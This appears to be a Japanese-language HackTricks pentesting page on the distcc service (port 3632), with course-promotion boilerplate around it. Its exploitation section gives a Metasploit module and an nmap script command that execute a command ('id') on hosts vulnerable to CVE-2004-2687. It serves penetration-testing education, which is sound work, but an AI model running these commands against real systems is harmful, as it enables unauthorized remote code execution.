hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.8 KiB

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェック!

HackTricksをサポートする他の方法:

基本情報

Distccは、他のコンピューターの未使用の処理能力を利用してコンパイルを高速化するように設計されています。distccがインストールされたマシンは、コードをネットワークを介してdistccdデーモンと互換性のあるコンパイラがインストールされたコンピューターに送信してコンパイルすることができます。

デフォルトポート: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

悪用

任意のコードを実行するために、CVE-2004-2687 に対して脆弱かどうかを確認します:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Shodanはこのサービスを検出しないと思います。

リソース

投稿者 Álex B (@r1p)

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェック!

HackTricksをサポートする他の方法: